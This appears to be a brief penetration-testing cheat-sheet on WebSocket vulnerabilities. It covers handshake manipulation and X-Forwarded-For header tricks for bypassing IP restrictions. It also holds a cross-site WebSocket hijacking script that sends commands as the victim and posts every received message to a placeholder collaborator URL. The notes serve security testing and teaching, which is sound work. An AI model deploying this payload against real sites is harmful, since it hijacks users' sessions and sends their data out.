Common vulnerabilities
Manipulating Websocket Handshake
clone
for a connected websocket or reconnect
for a disconnected websocket
connect
to test out the configured handshakeX-Forwarded-For
or any custom headers
X-Forwarded-For
can sometimes bypass IP restrictionsCross-site WebSocket Hijacking
<script>
var ws = new WebSocket('wss://{websocket_rl}');
ws.onopen = function() {
ws.send("{command_to_send_as_user}");
};
ws.onmessage = function(event) {
fetch('{collaborator_url}', {method: 'POST', mode: 'no-cors', body: event.data});
};
</script>